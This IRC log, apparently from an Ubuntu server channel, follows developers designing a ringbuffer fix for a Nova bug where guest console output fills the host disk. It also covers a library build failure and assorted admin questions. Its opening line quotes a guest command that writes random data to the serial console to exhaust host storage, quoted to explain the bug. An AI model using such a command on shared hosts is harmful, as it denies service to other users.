<Daviey> twb: The problem is that a guest can fill up the hosts hard disk, with cat /dev/urandom > /dev/ttyS0 , from within the instance.
<rbasak> twb: udp ports how?
<twb> Daviey: ah, DOS nice
<twb> rbasak: I dunno
<soren> Sorry, what's the problem now?
<soren> I thought we had a way forward?
<Daviey> soren: seems not.
<soren> How come?
<rbasak> well hang on, I didn't say that :)
<twb> Obviously the solution is to mount a tmpfs on /var/log/libvirt-bin :P
<twb> -osize=8M
<rbasak> I was just brushing up on what the actual behaviour wasw
<rbasak> I'm not fully clear on soren's plan but now I might be capable of understanding it :)
<Daviey> soren: Ah, might have jumped too fast.
<twb> Oh, I see, it's the same problem
<twb> rbasak: I thought you were using -net blah to set up some kind of handy-dandy fifo-backed thing
<soren> I thought we would just tell kvm to output to a fifo and read from that. Leave it to nova to implement a ringbuffer-style behaviour.
<rbasak> soren, where and how is the fifo going to be listened to? Only on a get_console_output call, or periodically too, and is the fifo going to get persistently held open or opened and closed?
<twb> soren: pump it into logger(1)
<soren> If Nova dies and the guest fills up the buffer and kvm can't deal with that in a nice way, screw it. They did this to themselves.
<twb> Then it becomes rsyslog's problem
<soren> rbasak: Hold it open, read from it periodically *and* on get_console_output.
<soren> rbasak: That'll make sure we keep flushing it even if noone calls get_console_output, but someone calling get_console_output will also get completely up-to-date responses.
<rbasak> OK and where do we write the data that we read, and how are we managing the space usage of that?
<soren> Flush it out the filesystem.
<soren> Imposing a limit on its size.
<rbasak> to a console.log file that can grow indefinitely? :-P
<rbasak> ah ok
<rbasak> What do we do if it hits the limit?
<twb> All logs can grow indefinitely
<twb> That's what logrotate is for
<soren> Pretend it's a ringbuffer.
<twb> The issue just becomes can you -HUP the writer to make it acquire a new fd
<rbasak> So just seek to the beginning again?
<rbasak> and are you expecting get_console_output to grok the ringbuffer and start reading at the right point?
<soren> I'm expecting everything to do The Right Thing[tm] :)
<twb> It's not different from e.g. DOSsing the logfile by making sshd emit a "rejected connection for user root from host 1.2.3.4" messages
<soren> twb: We don't want to let these logs grow indefinitely.. and logrotate doesn't do that either. By default, at least. It expires old logs and throws them away.
<Daviey> well logrotate cannot act fast enough.
<soren> rbasak: It's probably worth investigating how big of a message you can get through the message queue (which is how the console output will make its way from the compute node to the API node).
<Daviey> rotatelog can, as it's piped through..
<twb> Daviey: why?  How is it different from filling the logs via some other program?
<Daviey> but i'd rather rip my head off than use rotatelogs
<Daviey> twb: Isn't that the same reason people often put /var/ on a seperate partition?
<twb> Indeed
<Daviey> The difference here, the server admin currently has no way of controlling the speed of the log writes.
<twb> He doesn't have that with e.g. sshd either
<twb> Unless there's something in rsyslog I'm unaware of
<twb> Hell, apache would probably be an even better exaample, because it logs user-supplied string by default
<rbasak> OK so I need to patch nova to: 1) create a fifo and open it persistently before it calls libvirt to start the process (I assume right now it relies on qemu to create console.log; we'd be creating that as a fifo in advance). 2) Periodically suck data out of the fifo and give it to the handler. 3) Also do step 2 before processing get_console_output. 4) Write a handler that will write round robin to a real console.log, which will wrap if seek position
<rbasak> goes above a limit, and keep track of where it is in memory (so a ringbuffer implementation managed in memory with a disk data store)
<twb> So make requests as fast as you can with a 1024kB-long user-agent
<rbasak> 5) get_console_output now needs to read through the ringbuffer implementation
<twb> What I'm geetting at here is: you're not special, everybody has this problem
<twb> Rolling an app-specific fix is silly
<rbasak> twb: it'd break the API
<rbasak> twb: get_console_log really needs to output the last x bytes written to the console
<twb> rbasak: throw away the API then ;-)
<rbasak> twb: what happens if the call comes just after the log was rotated?
<soren> twb: We're perfectly happy to discard old data.
<twb> Oh, hang on, I think I misunderstood
<Daviey> We only /need/ 16K IMO.
<twb> You're saying that ttyS0 in the guest is directly connected to a file on the server?
<rbasak> twb: currently, yes
<twb> And you can't connect it to a pty instead?
<soren> Daviey: Whuh? That won't even fit all of the bootup-messages.
<rbasak> twb: it can be done but painfully
<soren> twb: How would that help?
<twb> I guess becaus then you don't get any history until you connected
<twb> s/until/before/
<twb> THat's what I'm doing for my libvirt KVM  VMs, so I don't have to use VNC
<soren> This console output stuff is read-only.
<twb> OK, let me get even weirder
<soren> Using a pty sounds like adding another layer of problems.
<twb> Turn that off, and instead use netconsole.ko in the guest
<soren> Can't.
<soren> It's not ours to control.
<twb> So the VM could be windows or something?
<soren> This is the cloud. WE provide infrastrucute, random nutjobs run their guests.
<twb> OK
<soren> Right now, the contract is: Shove the stuff into the virtual serial port, and it'll magically turn up in GetConsoleOuput's response.
<Daviey> soren: sorry, 64K
<soren> ..and we can't really change that contract.
<soren> Well, we can, but we need much better arguments than have been made here.
<soren> Since that's what all the existing EC2 images do and losing compatibility with them over something like this sounds like a really bad idea.
<rbasak> soren: what do you think of my plan (which is just my understanding of your plan with the details filled out)? Will it work? Would you accept it?
<Daviey> soren: Hah, smoser has been pushing for ages that openstack should just provide the hardware.. not this poking, reaching in lark that has been punted.
<soren> rbasak: It sounds good, yes.
<soren> Daviey: And I completely agree with that.
<rbasak> the only catch I can see is that the ringbuffer management is in memory so if nova dies then the stored console log is no longer readable (it'll wrap at an unknown location)
<soren> Yeah, just put it in the file.
<soren> Like you suggested a couple of days ago.
<rbasak> and of course if nova does then we'll lose the fifo fd and that'll mess things up
<rbasak> Oh, OK :)
<rbasak> So that'll make the ringbuffer robust
<rbasak> but what about re-opening the fifo if nova is restarted?
<soren> Just make the first line something like: <max_length> <current tail position>
<soren> rbasak: What about it?
<Daviey> soren: Do you have time to discuss this, shouldn't you be arguing about what code hosting to use? :)
<rbasak> soren: I presume I'll need to implement that, but I don't know where or how
<twb> OK, REALLY leaving now
<soren> Daviey: Everyone else is asleep. I can do whatever I want. When they turn up, I'll get back to bitching about tooling.
<Daviey> twb: have fun o/
<rbasak> soren: the first line would have to be a fixed length
<Daviey> soren: cool :)
<soren> rbasak: Just open it again when nova starts. It has code already to pick up where it left off.
<soren> rbasak: That would certainly make it easier.
<rbasak> OK so that's a step 6 in my plan
<soren> rbasak: "<0-padded 64 bit hex max_length> <0-padded 64 bit hex current_tail>\n"
<rbasak> I suppose I could pad <current tail position> with zeroes to the same length as max_length
<rbasak> why hex?
<soren> Because 64 bit is a predictable lenght in hex.
<soren> Not so much in decimal.
<rbasak> oh, one other thing about the disk ringbuffer format
<soren> You can go with octal if you want.
<soren> Or binary. Just not decimal :)
<rbasak> If I use ascii then it'll corrupt if killed
<soren> Why?
<rbasak> I can't update it atomically
<soren> What *can* you update atomically?
<rbasak> If I use a binary int then it will
<soren> eh?
<rbasak> Maybe it's overkill
<soren> Why is it less atomic if you encode it in ASCII?
<Daviey> can be improved over time, having /something/ would be nice for first fix :)
<rbasak> ascii will cover many more bytes
<soren> Still *well* within a filesystem block.
<rbasak> too many layers before it gets to a filesystem block. is everything aligned before then?
<rbasak> anyway, as Daviey says
<rbasak> I'll find or implement a ringbuffer class
<rbasak> We could fix that later :)
<soren> You're arguing that writing 8 bytes rather than 16 bytes makes it more atomic?
<lifeless> yay memory tears.
<lifeless> :P
<rbasak> I'm arguing that atomic_t is atomic and nothing else is
<rbasak> (guaranteed)
<soren> Not sure what relevance atomic_t's have here?
<soren> What am I missing?
<soren> atomic_t sounds like wicked name for a rapper, though.
<rbasak> https://bugs.launchpad.net/nova/+bug/832507/comments/4
<uvirtbot> Launchpad bug 832507 in nova "console.log grows indefinitely" [High,In progress]
<rbasak> Is this OK with everyone?
<soren> Yes.
<Daviey> looks good
<rbasak> cool
<rbasak> Implementation details that are a bit unclear to me: doing periodic jobs, and the restart logic
<rbasak> I might need some pointers on the way if that's OK soren?
<koolhead11> does it makes sense to do system lockdown with gconf anymore?
<soren> Sure.
<Daviey> rbasak: restart logic might be for free.
<Daviey> koolhead11: gconf? wat?
<rbasak> Daviey: I think I see what you mean
 * rbasak isn't familiar with the Nova source yet
<Daviey> rbasak: You ca use my bzr branch for inspiration where the entry point is to mk the fifo
<rbasak> I didn't test what happens if the fifo reader blocks so the fifo buffer fills (but still has it open). qemu will either block or it won't. I don't think it matters as we'll suck at a reasonable periodic rate and if the guest wants to dump tons to the console it's reasonable for it to be slowed down
<rbasak> thanks Daviey
<koolhead11> Daviey: for ubuntu desktop in  lockdown enviornment
<Daviey> soren: What would be a good example of a scheduled task to use?
<Daviey> rbasak: you should be able to first just read directly from the fifo with minor changes to my branch..
<Daviey> difference between a mknod and mkfifo is small :)
<soren> Daviey: nova.compute.manager has a period_tasks that does various things.
<soren> err...
<soren> periodic_tasks
<soren> Daviey: We should extend it to call driver specific periodic_tasks.
<Daviey> rbasak: Get that working first, then think about changing the behaviour to schedule a task to read and put to txt file.. Then make get-console read from the txt file, rather than the fifo (the branch i have edits the read log part.)
<rbasak> Daviey: I see it, thanks
<rbasak> Daviey: why do we need root to create the fifo?
<soren> rbasak: Only root can mknod.
<soren> rbasak: So Daviey needed it.
<soren> We might not need it.
<Daviey> yeah, drop that
<soren> (since we're only mkfifo'ing, but I'm not completely sure we're in the clear anyway)
<soren> It depends who the guest is going to run as.
<Daviey> you can still chown a fifo :/
<jamespage> negronjl: hey - please give me a ping re tomcat formulas when you start your day
<rbasak> Daviey: I'm only seeing the fifo being opened, don't see anything about reading it
<rbasak> Daviey: have you pushed?
<soren> Daviey: Sure, sure. I'm just pondering who needs to own it.
<rbasak> http://bazaar.launchpad.net/~davewalker/nova/832507_with_emlog/revision/1509 is the only revision I can see
<Daviey> rbasak: def _dump_file(self, fpath):
<soren> Daviey: Have you used the dashboard package, by the way?
<rbasak> Daviey: oh, right
<Daviey> soren: no, but i believe it is known to be broken
<Daviey> rbasak: I had to make changes to that to make it not block, i don't know if a fifo will need that like my nod did.
<soren> Daviey: Ah.
<rbasak> Daviey: yeah I think it will, otherwise it'll just hang there waiting for all console output ever
<Daviey> soren: Have you tried it the dash?
<soren> A long, long time ago.
<rbasak> Daviey: non-blocking using Python file objects is a bit dodgy actually, it might not work and I might need to use os.read instead
<Daviey> soren: from the package?
<soren> Daviey: Nope.
<Daviey> soren: I don't believe we can currently get ec2 creds from it, which is a pain.
<soren> Daviey: WEll,...
<soren> Daviey: Yes, I've *tried* trying it.
<Daviey> rbasak: So it isn't using normal os, it's overidden by greenlet
<Daviey> err, eventlet
<rbasak> Daviey: I'm not familiar with that, what are the implications?
<soren> Oh, dear.
<soren> rbasak: Pretend like you don't know the first thing about blocking and non-blocking I/O.
<soren> rbasak: Because eventlet will screw with all of that.
<rbasak> So how should I suck all available data out of the fifo but not block?
<soren> Do it like someone who hasn't a clue there's such a thing a blocking or non-blocking I/O.
<rbasak> will what Daviey has already work?
<soren> Just read.
<soren> Haven't looked at it.
<koolhead11> soren: is there something like nova --version ?
<soren> koolhead11: There ought to be, but there probably isn't. We log the version in the logfiles, but I don't think we expose it that way.
<rbasak> soren: I don't see how I can code in ignorance like that. Will my call block or won't it?
<koolhead11> soren  dpkg -l says 2011.3. something
<Daviey> rbasak: So what i have in that for reading, doesn't block
<Daviey> if it blocks without it, add it in :)
<soren> rbasak: Yes.
<Daviey> rbasak: just opening it with NONBLOCK did infact block, thanks to eventlet
<koolhead11> jamespage: hellos
<soren> rbasak: I'm not trying to be more of an arse to you than eventlet is to everyone else. You just read and cross your fingers hoping that eventlet does something vaguely reasonable on the backend.
<Daviey> rbasak: soren is right.. I couldn't work out why the hell it was blocking when it was os.open'd NONBLOCK.. it was only when i started inspecting the object that i realised it wasn't normal os
 * jamespage waves at  koolhead11
<Daviey> frustrating()
<rbasak> Presumably someone chose to use eventlet here, and presumably whoever that is knows it well. Can we ask him how we should read from a FIFO?
 * koolhead11 bows to TeTeT: 
<koolhead11> jamespage: wassup?
<soren> while fifo.read():
<soren>     do_stuff_with_it()
<rbasak> and that won't block when the fifo is starved?
<soren> Depends on what "that" is.
<soren> Nova, no. Your loop, yes. PRobably.
<Daviey> rbasak: probably worth just trying it to see what happens?
<Daviey> suck it and see. :)
<soren> rbasak: You'd think that whoever chose it knew it really well. You'd be wrong.
<soren> rbasak: It was chosen because it made the code easier to read for people who didn't understand async code and non-blocking i/o and whatnot.
<rbasak> Daviey: I hate coding like that, can you tell? Otherwise it may break for an unknown unfathomable reason later, especially with stuff like this where we're heavily dependant on what's going on with the underlying fifo
<soren> Why they're more important than my sanity, I don't know.
<soren> This was a chance to argue endlessly about something, so of course we did.
<Daviey> rbasak: Hey, if the unit tests pass, ship it.. that is the upstream workflow :P
 * rbasak wonders how many race conditions there are in nova at the moment
<soren> Daviey: Luckily, our test suite is awesome....
<soren> Daviey: ....ly slow.
<soren> But I digress.
<Daviey> soren: well if rbasak makes a change that breaks a unit test, we just SKIP the unit test, right?
<soren> Daviey: Too obvious. Just remove it.
<rbasak> I can always "adjust" the test
<Daviey> heh
<Daviey> rbasak: Sorry, i was commenting on the fact that nova has history of disabling tests which are annoying and fail.
<Daviey> This was yet another area that upstream were able to argue the moral toss about.
<soren> And I have a history of crying myself to sleep.
<soren> These facts are related.
<uvirtbot> New bug: #836664 in python-anyjson (main) "[MIR] python-anyjson" [Undecided,Fix released] https://launchpad.net/bugs/836664
<koolhead11> soren: http://paste.ubuntu.com/685140/  nova version :-> http://paste.ubuntu.com/685142/
<soren> koolhead11: Zones are mysterious to me. I suggest you ask someone like sandywalsh.
<koolhead11> Daviey: i have my fingures crossed, we will be testing new oneiric images  via cobbler :)
<Daviey> koolhead11: cool
<rbasak> https://bugs.launchpad.net/ubuntu/+source/asterisk/+bug/831228
<uvirtbot> Launchpad bug 831228 in asterisk "asterisk version 1:1.8.3.3-1ubuntu1 failed to build in oneiric" [High,Confirmed]
<rbasak> This is a problem with the libc-client.so build
<rbasak> Even if I rebuild the debian binary, it's not import needed symbols
<rbasak> (but the debian binary has it right)
<Daviey> rbasak: Have you come across ld --as-needed?
<rbasak> no
<Daviey> rbasak: http://wiki.debian.org/ToolChain/DSOLinking
<Daviey> rbasak: which implies that uw-imap needs an extra LDFLAG?
<rbasak> yeah, maybe
<rbasak> is there a reason for debian and ubuntu to behave dfferently?
<rbasak> I haven't tested to see if debian rebuilds it right or not
<Daviey> rbasak: Debian will move to ld --as-needed one day it's suspected.
<Daviey> Some people feel it's easier for us to make the transsiiton first, then Debian.
<soren> Man, if we had to wait for Debian before we tried interesting toolchain changes...
<rbasak> So what's the current status?
<rbasak> It doesn't seem to just be new libraries
<rbasak> It's _all_ libraries
<Daviey> rbasak: yup!  Which is the main reason we have so many FTBFS's
<Daviey> fwiw, this was tried last cycle - and was reverted before release.
<Daviey> It could happen again, but i'm doubtful.
<rbasak> yeah -Wl,--no-as-needed fixes it
<rbasak> so now I just have to find a proper solution
<Daviey> rbasak: well that will be ok for a last resort, just need to find out what the missing lib is.
<rbasak> Daviey: well, all of them are missing
<rbasak> that's the odd thing
<rbasak> even though they are specified on that same line
<Daviey> rbasak: it culd be an ordering issue then
<Daviey> could*
<rbasak> the current line is: gcc --shared -Wl,--no-as-needed,-soname,libc-client.so.$(VERSION) $(PAMLDFLAGS) -lc $(EXTRALDFLAGS) $(SSLLDFLAGS) -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err -o
<rbasak> (I added --no-as-needed)
<rbasak> without --no-as-needed, that results in ldd reporting only libc and ld.so, linux-gate etc
<Daviey> -o needs to be before LDFLAGS
<Daviey> 12:04 -!- doko_ [~doko@dslb-088-073-086-171.pools.arcor-ip.net] has quit [DISGUSTED]
<rbasak> that makes a difference?
<Daviey> yah!
<rbasak> OK then the build system has  problem
<Daviey> rbasak: For example, http://launchpadlibrarian.net/79186443/monkey_0.9.3-1_0.9.3-1ubuntu1.diff.gz
<rbasak> It's really a variable that's being set, it assumes that -o is at the end
<Daviey> Yeah, that is the bug
<rbasak> http://paste.ubuntu.com/685163/ look at line 180
<rbasak> To fix this, the build system is going to need a radical change
<rbasak> echo "$(ARRC) $(ARCHIVE) $(BINARIES);$(RANLIB) $(ARCHIVE)" > ARCHIVE
<rbasak> looks like that's how it works
<rbasak> I suppose I could add an ARRC_AFTER_ARCHIVE or something
<Daviey> :/
<rbasak> It does look like a rather insane build system
<Daviey> rbasak: :(
<koolhead17> TeTeT: need your help. ping me back when your around.
<rbasak> it does feel a bit odd that to fix an asterisk ftbfs I'm hacking an imap library makefile
<rbasak> wtf does asterisk do with imap anyway?
 * rbasak resists running configure with --without-imap
<Daviey> rbasak: stores voicemail in imap as an option
<Daviey> pretty nifty feature to sync it to a mail account TBH.. when you mark the email as read, asterisk knows the voicemail has been listened to :)
<rbasak> Ah I see
<rbasak> I was going to suggest that if only there were some kind of common protocol to trasmit IMAP messages over the the Internet :-P
<Daviey> heh
<rbasak> (but I suppose for the mark as seen case I'll accept it :-)
<TeTeT> koolhead17: sure, what's the problem?
<rbasak> Daviey: In http://launchpadlibrarian.net/79186443/monkey_0.9.3-1_0.9.3-1ubuntu1.diff.gz you've moved two things - $OBJ to the front and $LDFLAGS to the back. Do I need both?
<rbasak> Or does the location of $OBJ not matter?
<uvirtbot> New bug: #844712 in mysql-5.1 (main) "package mysql-server-5.1 5.1.54-1ubuntu4 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/844712
<Daviey> OBJ is a weird thing that only that has, unless i am mistaken
<rbasak> I assume it's the list of source object files
<rbasak> Needs to go somewhere
<rbasak> Oh, or is that $mod_obj in your case?
 * Daviey can think of somewhere to put it.
<Daviey> ah yes
<rbasak> lol
<rbasak> OK, that worked
<Daviey> rocking!
<Daviey> rbasak: BTW, did you add your DEBEMAIL to your launchpad account?
<koolhead17> TeTeT: curently am using lucid LTS for deployments and we had to lockdown the desktop apps so we used gconf there, now when i will upgarde to new LTS it will have Unity in it. It means all configurations woll break?
<TeTeT> koolhead17: I suspect so
<TeTeT> koolhead17: you might need to have a custom package that installs lock downs for unity / gnome 3 based on the old gconf settings
<koolhead17> TeTeT: so how will i achive that :(
<koolhead17> also from now on for coming deployments i have to read/tweak Unity for the same lockdown approach
<TeTeT> koolhead17: I guess finding the counter for the old lockdown settings in the new distro will do the job. Though I suspect there will not always be 1:1 replacement
<koolhead17> TeTeT: and also suggest me some alternative i should work on for the same
<TeTeT> koolhead17: I'd recommend to grab an oneiric desktop in a vm and see if you can lock it down in a similar way as 10.04 LTS. If some pieces are missing, file bugs or talk to the devels directly and see if it can be integrated
<koolhead17> TeTeT: hmm. Some tough work lined up it seems for me. :D
<TeTeT> koolhead17: not only for you, there are lots of deployments that face massive changes with the move to gnome 3 and unity
<koolhead17> TeTeT: so we are on same side!! :D
<uvirtbot> New bug: #831228 in asterisk (universe) "asterisk version 1:1.8.3.3-1ubuntu1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831228
<uvirtbot> New bug: #844114 in pep8 (main) "Please merge pep8 0.6.1-2 from debian unstable (main)" [Undecided,Fix released] https://launchpad.net/bugs/844114
<rbasak> Daviey: just done it now. It needed me to merge my @ubuntu.com address into my main launchpad account, now done
<Daviey> rbasak: cool, otherwise launchpad doesn't know it was your upload
<Sander^work> Hi. I get: make: cc: Command not found
<Sander^work> Tried to install gcc, but it says: Package gcc is not available, but is referred to by another package.
<rbasak> Try installing build-essential
<Sander^work> Can't find it
<pmatulis> !info build-essential
<ubottu> build-essential (source: build-essential): Informational list of build-essential packages. In component main, is optional. Version 11.5ubuntu1 (natty), package size 5 kB, installed size 48 kB
<Pici> Sander^work: What release of Ubuntu are you using?
<Sander^work> 10.04
<Sander^work> newly installed
<Pici> Sander^work: Please run apt-get update and then see if you can install build-essential again.
<Sander^work> Pici, thanks :-)
<rbasak> Daviey: please pull and upload lp:~racb/+junk/uw-imap. LP #831228. Hope the fix isn't too hacky, it's the cleanest i could come up with without being too intrusive.
<uvirtbot> Launchpad bug 831228 in asterisk "asterisk version 1:1.8.3.3-1ubuntu1 failed to build in oneiric" [High,Confirmed] https://launchpad.net/bugs/831228
<rbasak> Daviey: After that do we need to do a no-change update for asterisk or will it rebuild by itself?
<Daviey> rbasak: can you propose it for merging?
<Daviey> you could even try bzr lp-propose-merge ? :)
<uvirtbot> New bug: #843701 in tomcat7 (main) "CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure" [Undecided,New] https://launchpad.net/bugs/843701
<Daviey> rbasak: Does asterisk actually need rebuilding?  There is a binary in the archive, it just wouldn't rebuild..
<Daviey> It needs rebuilding if the binary is currently broken tho
<rbasak> Daviey: I'd love to...how?
<rbasak> oh
<koolhead17> TeTeT: http://developer.gnome.org/gio/stable/ch28.html But i doubt it will work for next  LTS :P
<rbasak> bzr: ERROR: File exists: '/srv/bazaar.launchpad.net/mirrors/00/07/cf/61'
<rbasak> Ah OK, then it doesn't need rebuilding
<rbasak> It would be nice to know if it rebuilds to close the bug though
<rbasak> Is there a way to propose a merge through the web app?
<Daviey> rbasak: yes
<Daviey> bzr lp-open ; click "propose merge"
<Daviey> ah dammit
<Daviey> it's in +junk
<rbasak> where should I have pushed it o?
<rbasak> to?
<Daviey> needs to be in lp:~racb/ubuntu/uw-imap/BRANCH-NAME
<Daviey> (maybe BRACH-NAME = bug number)
<soren> Will that work?
<soren> I thought it needed to be ~XXX/ubuntu/uw-imapd/oneiric/BRANCH-NAME
<soren> With ~XXX/ubuntu/uw-imap just being an alias.
<rbasak> bzr push lp:~racb/ubuntu/oneiric/uw-imap/831228 worked
<rbasak> bzr push lp:~racb/ubuntu/uw-imap/831228 did not
<zul> holy crap uw-imap...old school
<soren> right, of course.
<zul> uw-imap was the first imap server i used....then i growed up
<Daviey> soren: Ah, yes - that was an intentional mistake to see who was paying attention]
<Daviey> zul: You are a big boy now!
<nigelb> Rule #284058: When wrong, always claim it was a test.
<zul> Daviey: yes i took the pacifier out
<rbasak> OK merge proposed
<rbasak> zul: well asterisk depends uw-imap. what fun!
<zul> rbasak: heh..
<smoser> that was a fun conversation up above, regarding console
<smoser> the thing that i'm concerned about is that you're going to have to be polling that buffer fifo fairly often, aren't you?
<smoser> rbasak, ^ ? soren ^?
<soren> smoser: Why?
<smoser> because on kernel boot (or potentially at any point) you will have a fairly quick 30k set of writes
<soren> smoser: The kernel has a 64k buffer for named pipes.
<smoser> so if i turn kernel messages to verbose then i just block boot until the daemon comes trhough and reads.
<soren> MAybe.
<smoser> or (actual real life) if i use a kexec loader, and get 2 kernels worth of output
<soren> I haven't actually checked that.
<soren> I woulnd't be overly surprised if it just discarded anything exceeding those 64k.
<soren> "it" == qemu.
<smoser> i happen to know that 2 kernels worth of boot will not fit in 64k thanks to bug 566793
<uvirtbot> Launchpad bug 566793 in eucalyptus "[SRU] euca-get-console-output gives first 64k of output, not most recent" [Undecided,Fix committed] https://launchpad.net/bugs/566793
<soren> If you think we need to run it more frequently than once a minute, that's not a problem. I just didn't think it would be.
<smoser> i'd be surprised if qemu is doing anything more intelligent than writing to the target.
<soren> Well, for one it doesn't hang if nothing is listening.
<smoser> listening to the fifo ?
<smoser> it doesn't ?
<soren> Yes.
<soren> No.
<smoser> ah.
<smoser> well then clearly i'm wrong
<soren> So it's certainly smarter than something htat just assumes writing to a pipe works.
<soren> It even buffers the stuff that isn't read (Because nothing is connected) and flushes it to whoever comes along and starts reading.
<smoser> so how will this solution play withthe other uses of that console ?
<soren> Which other uses?
<smoser> i think there was disicussion at least of some way to multiplex that output
<smoser> so that a user could get an ajaxterm or something and not break the console output
<smoser> putting something in between.
<soren> We'll deal with that when it starts to happen.
<smoser> i dont know .... just thinking.
<smoser> :)
<soren> No point in engineering a whole bunch of stuff nothing will need/use.
<smoser> true
<smoser> i'm really curious what kvm does with the writes  if no one is listening.
<soren> It's not like something is going to come along from the side wanting to look at this. These are Nova's VM's.
<soren> I don't know for sure, but I see a couple of options.
<soren> Doing it in a thread.
<smoser> i wonder where my laptop writes when i'm not here to look at the screen and read its buffer
<soren> ...will just hang, but who cares? It's a separate thread..
<soren> or doing non-blocking I/O, using select() to wait for something that's willing to listen.
<smoser> yeah, i think its easonable.
<smoser> reasonable
<soren> smoser: Your laptop is a different story.
<soren> I could tell you, but that would ruin the fun.
<smoser> i just assumed  that amazon had the 4 minute delay just to stop polling on the console
<smoser> but i suspect now that it is more complex, and possibly related to this :)
<soren> I'm having troube figuring out why they do that.
<soren> It makes no real sense to me.
<soren> It seems incredibly arbitrary and inelegant.
<soren> Any problem I can envision that would be solved by something like that would be so much more elegantly solved by different means.
<smoser> because they only have to have their fifo-emptier come through every 4 minutes then.
<smoser> and can even schedule it to happen 4 minutes after hypervisor detects reboot
<soren> And that's only a problem if it's one, great big fifo-emptier for all of EC2.
<smoser> i agree.
<soren> OUrs just runs on the compute node. It would at the most have to scale to... I don't know, maybe 64 guests.
<smoser> its a interesting problem.
<soren> Hardly a major problem.
<soren> Now, if they run on each node, but send the stuff they collect to a central node or shove it in a database, that would also explain it.
<soren> But why do that? To save a roundtrip to the compute nodes from their frontends if someone asks for this?
<smoser> i really doubt that a call to GetConsoleOutput hits the node
<smoser> anyway.
<smoser> i just find it surprising that this is so complicated and there wasn't an existing solution for this sort of thing.
<LinuxAdmin> hi guys
<soren> If a GetConsoleOutput call doesn't hit the node, they're storing these things centrally. That sounds like a fascinating way to scale somthing like this.
<soren> But meh.
<LinuxAdmin> I forgot the password of a KVM virtual machine. how can I recover it?
<LinuxAdmin> I've got virt-manager installed
<LinuxAdmin> on a different host
<soren> LinuxAdmin: Same way you'd recover it from any other box.
<soren> LinuxAdmin: Boot into resuce mode.
<soren> LinuxAdmin: Or take its disk somewhere else, mount it, reset the password, put it back into the machine.
<_ruben> bah .. keepalived doesn't seem to work well when using unnumbered interfaces :(
<LinuxAdmin> how can I boot a VM into rescue mode?
<soren> LinuxAdmin: How d oyou boot any other machine into rescue mode?
<soren> (The astute reader will notice a pattern here)
 * ersi facepalms
<soren> _ruben: Unnumbered interfaces?
<soren> _ruben: What does that mean?
<ersi> LinuxAdmin: By rebooting the machine and haxxing it up in the "boot prompt"
<_ruben> soren: interface without ip address configured
<soren> _ruben: Oh.
<LinuxAdmin> soren, I type "single" in the boot process
<LinuxAdmin> but I don't do it a long time
<jasonmsp> hey all.  My server was used last night in a DOS attack in an attempt to take out some DNS servers.  The hole that it used was due to the fact it is coming up as open resolver.  I've been reading up all day and can not find how to close it.  Any love?
<LinuxAdmin> I tryed restart the machine and then open immediately the virt-manager window, so I can see the boot process, but I could not interact with it.
<LinuxAdmin> how can I do it?
<soren> LinuxAdmin: Or take its disk somewhere else, mount it, reset the password, put it back into the machine.
<LinuxAdmin> soren, I'm talking about a virtual machine, its disk are virtual
<soren> Yes.
<soren> I realise.
<soren> That makes it even easier.
<soren> No need for screwdrivers.
 * soren needs to take a break
<rbasak> soren, smoser: just catching up with that
<rbasak> AFAICT, qemu ignores failed writes
<smoser> but writes to a file dont fail
<rbasak> I left a machine running outputting junk and timestamps to the console overnight
<smoser> :)
<rbasak> Left it without connecting a reader to the fifo
<rbasak> the timestamps started approx when I resumed reading the fifo
<rbasak> Nova is a persistent process, right? Can we hook into the eventing system to have an event when the fifo is available for reading?
<rbasak> (rather than trying to poll)
<paljas> Which setting on apache 2.2 on ubuntu makes that php pages are interpreted
<paljas> without the extension being given in the request? Can't find it in the
<paljas> config. It looks like /etc/apache2/mods-enabled/php5.conf only has some
<paljas> lines to matches .php file to the php handler, but apache also  matches
<paljas> things like /path/file instead of /path/file.php to the php handler.
<patdk-wk> there is no magic way to do that
<patdk-wk> cause how is apache suppost to know you wanted to use php for it? instead of like perl? or ruby?
<patdk-wk> the only magic you can do, is attempt a rewrite, to see that when someone asks for /path/file, to check if /path/file.php exists, if it does, use it
<just-a-visitor> It sounds like a rewrite rule.
<just-a-visitor> Oh.
<paljas> It's not that I want it, but it does.
<paljas> Could be done by: RewriteRule !\. - [H=application/x-httpd-php]
<paljas> but that's not in the config
<patdk-wk> heh? why would ubuntu have that in the config at all?
<patdk-wk> that isn't *normal*
<norc> I have an OVH server with Ubuntu Server 10.04 running. When I install a standard kernel, remove the OVH kernel and run update-grub and then reboot - the server doesn't come back up again and needs reformating
<patdk-wk> why would it need reformatting?
<norc> patdk-wk: because it doesnt boot back
<norc> For which reason I cannot determine
<patdk-wk> not booting and reformatting are two totally unrelated things
<norc> patdk-wk: point is, I dont have serial console access
<norc> If it doesnt come back up, the only thing I can do is hit the reformat button
<patdk-wk> what version of grub is on it?
<patdk-wk> oh? it's some kind of vps thing
<patdk-wk> likely they had some customizations, that normal ubuntu grub killed
<_ruben> which might require special initrd stuff which is now missing
<norc> patdk-wk: grub-setup (GRUB) 1.98-1ubuntu10
<norc> no its a dedicated root serer
<norc> but it does have a custom kernel
<norc> mhmmm
<_ruben> physical hardware with a reformat button? interesting
<norc> _ruben: no, a web interface with a reformat button.
<_ruben> doesn't make it less interesting .. it's a typical feature for virtualized stuff
<norc> Well its rather common for server providers these days
<paljas> patdk-wk: xxx.xxx.220.152 - - [08/Sep/2011:16:20:15 +0200] "GET /aap.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18 HTTP/1.1" 200 3042 "http://dateldb.net.xxx.nl/aap" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.22) Gecko/20110905 Ubuntu/10.04 (lucid) Firefox/3.6.22"
<norc> patdk-wk: how would I go about verifying grub integrity?
<patdk-wk> paljas, random logs don't make sense, without a referense as to why it's posted
<paljas> to show you ubuntu _does_ the rewrite
<patdk-wk> rewrites aren't logged like that
<patdk-wk> that was a redirect
<patdk-wk> probably cause of multiviews being on
<patdk-wk> so the user got a page saying, you asked for app, but it doesn't exist, but app.php does, did you really mean that?
<paljas> I'll have a look at multiviews.
<rbasak> smoser: so what do you suggest?
<smoser> i dont suggest that i have a solution.
<smoser> i'm just honestly surprised that this is this complicated
<smoser> :)
<smoser> i dont know about polling, does inotify support fifo having data ?
<paljas> patdk-wk: it is indeed due to multiviews. Thanx a lot!
